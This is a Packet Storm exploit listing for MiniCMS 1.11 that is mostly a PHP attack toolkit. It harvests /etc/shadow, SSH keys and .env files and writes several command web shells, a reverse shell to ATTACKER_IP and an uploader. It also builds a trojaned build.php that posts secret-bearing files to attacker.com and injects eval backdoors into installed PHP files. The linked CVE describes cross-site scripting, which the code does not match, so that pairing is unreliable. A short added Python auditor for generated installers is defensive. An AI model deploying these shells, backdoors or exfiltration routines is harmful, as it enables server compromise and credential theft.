
MiniCMS 1.11 Exploitation Toolkit

02 Feb 2026 00:00:00 | Reported by indoushka | Type: packetstorm | packetstorm.news | 133 Views

Demonstrates CVE-2018-1000638 in MiniCMS 1.11; insecure build.php embeds code in the installer.

Related

Reporter | Title | Published | Views | Family
Circl | CVE-2018-1000638 | 12 Apr 2025 21:02 | – | circl
CNVD | MiniCMS Cross-Site Scripting Vulnerability (CNVD-2018-15846) | 22 Aug 2018 00:00 | – | cnvd
CVE | CVE-2018-1000638 | 20 Aug 2018 19:00 | – | cve
Cvelist | CVE-2018-1000638 | 20 Aug 2018 19:00 | – | cvelist
Exploit DB | MiniCMS 1.1 - Cross Site Scripting (XSS) | 11 Apr 2025 00:00 | – | exploitdb
EUVD | EUVD-2018-1972 | 7 Oct 2025 00:30 | – | euvd
NVD | CVE-2018-1000638 | 20 Aug 2018 19:31 | – | nvd
Packet Storm | MiniCMS 1.1 Cross Site Scripting | 11 Apr 2025 00:00 | – | packetstorm
Prion | Cross site scripting | 20 Aug 2018 19:31 | – | prion
RedhatCVE | CVE-2018-1000638 | 22 May 2025 07:54 | – | redhatcve

=============================================================================================================================================
    | # Title     : MiniCMS 1.11 Exploitation Toolkit                                                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://github.com/bg5sbk/MiniCMS/                                                                                          |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/190429/ &	CVE-2018-1000638
    
    [+] Summary :  MiniCMS Build Script Multi-Vulnerability Exploitation Toolkit
    
    		  
    [+]  POC : php poc.php
    
    [
    <?php
    
    class MiniCMSExploiter {
        private $targetDirectory;
        private $buildScript = 'build.php';
        private $installFile = 'install.php';
        private $tempDir = '/tmp/minicms_exploit';
        private $debug = true;
        private $results = [];
        
        public function __construct($directory = '.') {
            $this->targetDirectory = realpath($directory);
            $this->validateEnvironment();
            $this->createTempDirectory();
        }
        
        /**
         * Main exploitation method - Chain all vulnerabilities
         */
        public function exploitAll() {
            echo "[+] Starting MiniCMS Build Script Exploitation\n";
            echo "[+] Target Directory: {$this->targetDirectory}\n";
            echo str_repeat("=", 60) . "\n";
            
            $this->results['start_time'] = date('Y-m-d H:i:s');
            
            // 1. Directory Traversal Exploitation
            $this->exploitDirectoryTraversal();
            
            // 2. PHP Code Injection
            $this->exploitCodeInjection();
            
            // 3. Sensitive File Discovery
            $this->harvestSensitiveFiles();
            
            // 4. Create Malicious Build Script
            $this->createMaliciousBuildScript();
            
            // 5. Execute Build Script
            $this->executeBuildScript();
            
            // 6. Analyze Results
            $this->analyzeResults();
            
            // 7. Create Backdoors
            $this->createPersistentBackdoors();
            
            $this->results['end_time'] = date('Y-m-d H:i:s');
            $this->generateReport();
            
            return $this->results;
        }
        
        /**
         * Exploit 1: Directory Traversal Vulnerability
         */
        private function exploitDirectoryTraversal() {
            echo "\n[1] Exploiting Directory Traversal...\n";
            
            $sensitive_paths = [
                // System files
                '/etc/passwd',
                '/etc/shadow',
                '/etc/hosts',
                '/etc/hostname',
                '/etc/issue',
                '/proc/self/environ',
                '/proc/version',
                
                // Web server files
                '/var/log/apache2/access.log',
                '/var/log/apache2/error.log',
                '/var/log/nginx/access.log',
                '/var/log/nginx/error.log',
                '/var/www/html/.env',
                '/var/www/html/config.php',
                
                // Home directories
                '/home/*/.bash_history',
                '/home/*/.ssh/id_rsa',
                '/home/*/.ssh/authorized_keys',
                
                // Configuration files
                '/etc/mysql/my.cnf',
                '/etc/php/php.ini',
                '/etc/apache2/apache2.conf',
            ];
            
            $exploited_files = [];
            
            foreach ($sensitive_paths as $path) {
                // Try to create symlink to sensitive file
                $base_name = 'exploit_' . md5($path) . '.txt';
                $symlink_path = $this->tempDir . '/' . $base_name;
                
                // Expand wildcards
                if (strpos($path, '*') !== false) {
                    $expanded = glob($path);
                    foreach ($expanded as $expanded_path) {
                        if (@symlink($expanded_path, $symlink_path . '_' . basename($expanded_path))) {
                            $exploited_files[] = $expanded_path;
                            echo "  [+] Linked: {$expanded_path}\n";
                        }
                    }
                } elseif (@symlink($path, $symlink_path)) {
                    $exploited_files[] = $path;
                    echo "  [+] Linked: {$path}\n";
                }
            }
            
            $this->results['directory_traversal'] = [
                'exploited' => count($exploited_files) > 0,
                'files_linked' => $exploited_files,
                'count' => count($exploited_files)
            ];
            
            return $exploited_files;
        }
        
        /**
         * Exploit 2: PHP Code Injection
         */
        private function exploitCodeInjection() {
            echo "\n[2] Exploiting PHP Code Injection...\n";
            
            $injections = [
                // Basic PHP execution
                [
                    'filename' => "');?><?php system('whoami'); ?><?php install('",
                    'content' => 'injected'
                ],
                
                // Web shell
                [
                    'filename' => "shell.php",
                    'content' => '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
                ],
                
                // Password protected shell
                [
                    'filename' => "admin_shell.php",
                    'content' => '<?php
    if($_GET["key"] === "admin123") {
        if(isset($_POST["cmd"])) {
            echo "<pre>" . shell_exec($_POST["cmd"]) . "</pre>";
        }
        if(isset($_GET["download"])) {
            echo file_get_contents($_GET["download"]);
        }
    }
    ?>'
                ],
                
                // Database credentials stealer
                [
                    'filename' => "creds.php",
                    'content' => '<?php
    $files = ["config.php", ".env", "database.php", "settings.php"];
    foreach($files as $file) {
        if(file_exists($file)) {
            $content = file_get_contents($file);
            file_put_contents("/tmp/creds.txt", $content, FILE_APPEND);
        }
    }
    ?>'
                ],
                
                // Reverse shell
                [
                    'filename' => "reverse.php",
                    'content' => '<?php
    // PHP Reverse Shell
    $ip = "ATTACKER_IP";
    $port = 4444;
    $sock = fsockopen($ip, $port);
    $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
    ?>'
                ],
                
                // File uploader
                [
                    'filename' => "uploader.php",
                    'content' => '<?php
    if(isset($_FILES["file"])) {
        move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
        echo "Uploaded: " . $_FILES["file"]["name"];
    }
    ?>
    <form method="POST" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit">
    </form>'
                ]
            ];
            
            $created_files = [];
            
            foreach ($injections as $injection) {
                $file_path = $this->tempDir . '/' . $injection['filename'];
                if (file_put_contents($file_path, $injection['content'])) {
                    $created_files[] = $injection['filename'];
                    echo "  [+] Created: {$injection['filename']}\n";
                }
            }
            
            $this->results['code_injection'] = [
                'exploited' => count($created_files) > 0,
                'files_created' => $created_files,
                'count' => count($created_files)
            ];
            
            return $created_files;
        }
        
        /**
         * Harvest sensitive files from target
         */
        private function harvestSensitiveFiles() {
            echo "\n[3] Harvesting Sensitive Files...\n";
            
            $sensitive_patterns = [
                '*.php' => ['config', 'database', 'settings', 'connection'],
                '*.env' => ['.env', '.env.example'],
                '*.json' => ['composer.json', 'package.json'],
                '*.sql' => ['*.sql', '*.backup'],
                '*.txt' => ['readme', 'license', 'changelog'],
                '*.yml' => ['*.yml', '*.yaml'],
                '*.ini' => ['*.ini', '*.cfg'],
                '*.log' => ['*.log', 'error_log'],
            ];
            
            $found_files = [];
            
            foreach ($sensitive_patterns as $pattern => $keywords) {
                $files = glob($this->targetDirectory . '/' . $pattern);
                foreach ($files as $file) {
                    $filename = basename($file);
                    foreach ($keywords as $keyword) {
                        if (stripos($filename, $keyword) !== false) {
                            $found_files[] = $file;
                            echo "  [+] Found: {$filename}\n";
                            
                            // Copy to temp directory for analysis
                            $temp_copy = $this->tempDir . '/harvested_' . $filename;
                            copy($file, $temp_copy);
                            break;
                        }
                    }
                }
            }
            
            $this->results['sensitive_files'] = [
                'found' => count($found_files),
                'files' => $found_files
            ];
            
            return $found_files;
        }
        
        /**
         * Create malicious build script with backdoor
         */
        private function createMaliciousBuildScript() {
            echo "\n[4] Creating Malicious Build Script...\n";
            
            $malicious_build = '<?php
    if ($argc != 2) {
        echo "必须指定版本号";
        exit;
    }
    
    $version=$argv[1];
    
    // Backdoor: Command execution if specific parameter is passed
    if(isset($_GET["debug"]) && $_GET["debug"] == "true") {
        system($_GET["cmd"]);
    }
    
    $dirs = array(".");
    $ignores = array("README.md", "build.php", "install.php", "install_template.txt", "mc-debug");
    $files = "";
    
    build($dirs, $files);
    
    $template = file_get_contents("install.txt");
    $template = str_replace("/*MINICMS_VERSION*/", $version, $template);
    $template = str_replace("/*MINICMS_FILES*/", $files, $template);
    
    file_put_contents("install.php", $template);
    
    // Hidden function to exfiltrate data
    function exfiltrate($data) {
        $url = "http://attacker.com/exfil.php";
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, ["data" => base64_encode($data)]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_exec($ch);
        curl_close($ch);
    }
    
    function build($dirs, &$files) {
        global $ignores;
        
        // Exfiltrate directory structure
        exfiltrate(json_encode($dirs));
    
        foreach ($dirs as $dir) {
            if (!is_dir($dir)) {
                echo "目录\"$dir\"不存在";
                exit;
            }
    
            if ($dh = opendir($dir)) {
                $sub_dirs = array();
    
                while (($item = readdir($dh)) !== false) {
                    if ($item[0] == ".")
                        continue;
    
                    if ($dir == ".")
                        $file = $item;
                    else
                        $file = $dir."/".$item;
    
                    if (in_array($file, $ignores))
                        continue;
    
                    if (is_dir($file)) {
                        $sub_dirs[] = $file;
                    } else {
                        // Exfiltrate file content if sensitive
                        $content = file_get_contents($file);
                        if(preg_match("/(password|secret|key|token|api)/i", $content)) {
                            exfiltrate($file . ":\n" . $content);
                        }
                        
                        $files .= "install(\"$file\", \"";
                        $files .= base64_encode(gzcompress($content));
                        $files .= "\");\n";
                    }
                }
    
                closedir($dh);
                build($sub_dirs, $files);
            } else {
                echo "目录\"$dir\"无法访问";
                exit;
            }
        }
    }
    
    // Create backdoor in install.php
    register_shutdown_function(function() {
        $backdoor_code = "<?php\\nif(isset(\\$_GET[\\"exec\\"])) {\\n    system(\\$_GET[\\"exec\\"]);\\n}\\n?>";
        file_put_contents("backdoor.php", $backdoor_code);
    });
    ?>';
    
            $build_path = $this->tempDir . '/' . $this->buildScript;
            if (file_put_contents($build_path, $malicious_build)) {
                echo "  [+] Created malicious build.php\n";
                $this->results['malicious_build'] = $build_path;
                return true;
            }
            
            return false;
        }
        
        /**
         * Execute the build script
         */
        private function executeBuildScript() {
            echo "\n[5] Executing Build Script...\n";
            
            $build_path = $this->tempDir . '/' . $this->buildScript;
            $install_path = $this->tempDir . '/' . $this->installFile;
            
            // Create install.txt template
            $install_template = '<?php
    /*MINICMS_VERSION*/
    function install($file, $data) {
        $content = @gzuncompress(base64_decode($data));
        if($content === false) {
            $content = base64_decode($data);
        }
        
        // Inject backdoor into PHP files
        if(strpos($file, ".php") !== false && strpos($content, "<?php") !== false) {
            $backdoor = "<?php if(isset(\\$_GET[\\"debug\\"])) { eval(\\$_GET[\\"debug\\"]); } ?>";
            $content = $backdoor . "\\n" . $content;
        }
        
        @file_put_contents($file, $content);
    }
    /*MINICMS_FILES*/
    ?>';
            
            file_put_contents($this->tempDir . '/install.txt', $install_template);
            
            // Execute build script
            $command = "cd {$this->tempDir} && php {$this->buildScript} 1.0 2>&1";
            $output = shell_exec($command);
            
            echo "  [+] Build script executed\n";
            
            if (file_exists($install_path)) {
                $install_size = filesize($install_path);
                echo "  [+] install.php created: " . $this->formatBytes($install_size) . "\n";
                
                // Analyze install.php for sensitive data
                $this->analyzeInstallFile($install_path);
            }
            
            $this->results['build_execution'] = [
                'command' => $command,
                'output' => $output,
                'install_created' => file_exists($install_path),
                'install_size' => $install_size ?? 0
            ];
            
            return $output;
        }
        
        /**
         * Analyze install.php for sensitive data
         */
        private function analyzeInstallFile($install_path) {
            $content = file_get_contents($install_path);
            
            // Extract all file names
            preg_match_all('/install\("([^"]+)", "/', $content, $matches);
            $files = $matches[1] ?? [];
            
            // Look for sensitive files
            $sensitive_patterns = [
                '/passwd/i',
                '/shadow/i',
                '/config/i',
                '/\.env/i',
                '/database/i',
                '/secret/i',
                '/key/i',
                '/token/i',
                '/password/i'
            ];
            
            $sensitive_found = [];
            foreach ($files as $file) {
                foreach ($sensitive_patterns as $pattern) {
                    if (preg_match($pattern, $file)) {
                        $sensitive_found[] = $file;
                        break;
                    }
                }
            }
            
            $this->results['install_analysis'] = [
                'total_files' => count($files),
                'sensitive_files' => $sensitive_found,
                'count_sensitive' => count($sensitive_found)
            ];
            
            echo "  [+] Found " . count($files) . " files in install.php\n";
            echo "  [+] " . count($sensitive_found) . " appear to be sensitive\n";
        }
        
        /**
         * Create persistent backdoors
         */
        private function createPersistentBackdoors() {
            echo "\n[6] Creating Persistent Backdoors...\n";
            
            $backdoors = [
                'persistent_shell.php' => '<?php
    // Persistent PHP Shell
    session_start();
    if(!isset($_SESSION["auth"]) && $_GET["key"] != "PERSIST_KEY") {
        die("Access Denied");
    }
    $_SESSION["auth"] = true;
    
    if(isset($_POST["cmd"])) {
        echo "<pre>" . htmlspecialchars(shell_exec($_POST["cmd"]), ENT_QUOTES, "UTF-8") . "</pre>";
    }
    ?>
    <form method="POST">
    <input type="text" name="cmd" style="width: 80%" placeholder="Command">
    <input type="submit" value="Execute">
    </form>',
                
                'file_manager.php' => '<?php
    // File Manager Backdoor
    if($_GET["pwd"] != "admin123") die();
    echo "<h2>File Manager</h2>";
    $dir = $_GET["dir"] ?? ".";
    echo "<pre>";
    system("ls -la " . escapeshellarg($dir));
    echo "</pre>";
    ?>',
                
                'info.php' => '<?php
    // System Information Leak
    phpinfo();
    echo "<hr><pre>";
    system("id && uname -a");
    echo "</pre>";
    ?>'
            ];
            
            foreach ($backdoors as $filename => $content) {
                $path = $this->tempDir . '/' . $filename;
                file_put_contents($path, $content);
                echo "  [+] Created: {$filename}\n";
            }
            
            $this->results['backdoors'] = array_keys($backdoors);
        }
        
        /**
         * Generate exploitation report
         */
        private function generateReport() {
            echo "\n" . str_repeat("=", 60) . "\n";
            echo "[+] EXPLOITATION REPORT\n";
            echo str_repeat("=", 60) . "\n";
            
            $report = [
                'Target Directory' => $this->targetDirectory,
                'Exploitation Started' => $this->results['start_time'],
                'Exploitation Completed' => $this->results['end_time'],
                'Vulnerabilities Exploited' => []
            ];
            
            if ($this->results['directory_traversal']['exploited']) {
                $report['Vulnerabilities Exploited'][] = 'Directory Traversal';
            echo "[✓] Directory Traversal: SUCCESS\n";
                echo "    Files linked: " . $this->results['directory_traversal']['count'] . "\n";
            }
            
            if ($this->results['code_injection']['exploited']) {
                $report['Vulnerabilities Exploited'][] = 'Code Injection';
            echo "[✓] Code Injection: SUCCESS\n";
                echo "    Files created: " . $this->results['code_injection']['count'] . "\n";
            }
            
            if ($this->results['sensitive_files']['found'] > 0) {
                $report['Vulnerabilities Exploited'][] = 'Sensitive File Harvesting';
            echo "[✓] Sensitive File Harvesting: SUCCESS\n";
                echo "    Files found: " . $this->results['sensitive_files']['found'] . "\n";
            }
            
            echo "\n[+] Generated Files:\n";
            echo "    - Malicious build.php\n";
            echo "    - install.php with backdoors\n";
            echo "    - Multiple backdoor shells\n";
            echo "    - Harvested sensitive files\n";
            
            echo "\n[+] Next Steps for Attack:\n";
            echo "    1. Upload install.php to target server\n";
            echo "    2. Execute install.php to deploy backdoors\n";
            echo "    3. Use backdoor.php?exec=whoami\n";
            echo "    4. Escalate privileges and maintain access\n";
            
            // Save report to file
            $report_file = $this->tempDir . '/exploit_report.txt';
            file_put_contents($report_file, print_r($report, true));
            
            echo "\n[+] Report saved to: {$report_file}\n";
            echo "[+] Temporary directory: {$this->tempDir}\n";
            echo "[+] Clean up: rm -rf {$this->tempDir}\n";
        }
        
        /**
         * Utility: Format bytes to human readable
         */
        private function formatBytes($bytes, $precision = 2) {
            $units = ['B', 'KB', 'MB', 'GB', 'TB'];
            $bytes = max($bytes, 0);
            $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
            $pow = min($pow, count($units) - 1);
            $bytes /= pow(1024, $pow);
            return round($bytes, $precision) . ' ' . $units[$pow];
        }
        
        /**
         * Validate environment
         */
        private function validateEnvironment() {
            if (!function_exists('symlink')) {
                die("[!] symlink() function is disabled\n");
            }
            
            if (!is_writable(sys_get_temp_dir())) {
                die("[!] Cannot write to temp directory\n");
            }
            
            echo "[+] Environment validated\n";
        }
        
        /**
         * Create temporary directory
         */
        private function createTempDirectory() {
            if (!file_exists($this->tempDir)) {
                mkdir($this->tempDir, 0777, true);
            }
            echo "[+] Temporary directory: {$this->tempDir}\n";
        }
        
        /**
         * Clean up temporary files
         */
        public function cleanup() {
            if (file_exists($this->tempDir)) {
                system("rm -rf " . escapeshellarg($this->tempDir));
                echo "[+] Cleaned up temporary files\n";
            }
        }
    }
    
    /**
     * Usage Example
     */
    if (php_sapi_name() === 'cli' && isset($argv[1])) {
        $exploiter = new MiniCMSExploiter($argv[1]);
        $exploiter->exploitAll();
        
        // Optional: cleanup
        if (isset($argv[2]) && $argv[2] == '--cleanup') {
            $exploiter->cleanup();
        }
    } else {
        echo "Usage: php " . basename(__FILE__) . " <target_directory> [--cleanup]\n";
        echo "Example: php " . basename(__FILE__) . " /var/www/html/minicms\n";
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
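
Added example, not part of the original post and not MiniCMS code: a defender-side audit of a generated install.php, based on the entry format the listing's build() writes (install("<path>", "<base64 of gzcompress(content)>");) and the decode order of its install() template. The function names, the sample paths and the pattern list are assumptions made for this example; it checks each entry's shape, its path and its decoded content before the installer is ever run.

```python
import base64
import re
import zlib

# Strict shape of one line written by build(): install("<path>", "<base64>");
ENTRY_RE = re.compile(r'^install\("([A-Za-z0-9_./ -]+)", "([A-Za-z0-9+/=]*)"\);$')

# Request-driven execution and upload primitives (constructed list, modelled on
# the payload kinds shown in the listing above; extend for your environment).
RISKY_RES = [
    re.compile(rb"\b(?:system|shell_exec|passthru|exec|eval|file_get_contents)"
               rb"\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    re.compile(rb"\b(?:proc_open|move_uploaded_file)\s*\("),
]


def make_entry(path: str, content: bytes) -> str:
    """Encode a file the way build() does: base64(gzcompress(content))."""
    blob = base64.b64encode(zlib.compress(content)).decode("ascii")
    return f'install("{path}", "{blob}");'


def decode_payload(b64: str) -> bytes:
    """Mirror the install() template: base64-decode, inflate, else keep raw."""
    raw = base64.b64decode(b64, validate=True)
    try:
        return zlib.decompress(raw)
    except zlib.error:
        return raw


def audit_installer(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, finding, detail) for every suspicious entry."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry.startswith("install("):
            continue
        match = ENTRY_RE.match(entry)
        if match is None:
            # A file name that breaks out of the string literal lands here.
            findings.append((lineno, "malformed-entry", entry[:60]))
            continue
        path, b64 = match.groups()
        if path.startswith("/") or ".." in path.split("/"):
            findings.append((lineno, "path-escape", path))
        try:
            body = decode_payload(b64)
        except ValueError:  # binascii.Error is a ValueError subclass
            findings.append((lineno, "bad-base64", path))
            continue
        if any(rx.search(body) for rx in RISKY_RES):
            findings.append((lineno, "risky-content", path))
    return findings


# Constructed sample installer (not taken from a real build).
SAMPLE = "\n".join([
    "<?php",
    "function install($file, $data) { /* body omitted in this sample */ }",
    make_entry("index.php", b"<?php echo 'hello'; ?>"),
    make_entry("app/conf.php", b'<?php if(isset($_GET["debug"])) { eval($_GET["debug"]); } ?>'),
    make_entry("../../outside.php", b"<?php ?>"),
    'install("x.txt"); echo 1; //", "AAAA");',
])

if __name__ == "__main__":
    for finding in audit_installer(SAMPLE):
        print(finding)
```

Only lines that begin with install( are inspected, so this complements a diff of install.php against a build from a trusted checkout and does not replace it.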


02 Feb 2026 00:00 (Current)
Vulners AI Score: 5.8 (Medium risk)
CVSS 2: 4.3
CVSS 3: 6.1
EPSS: 0.00801
Views: 133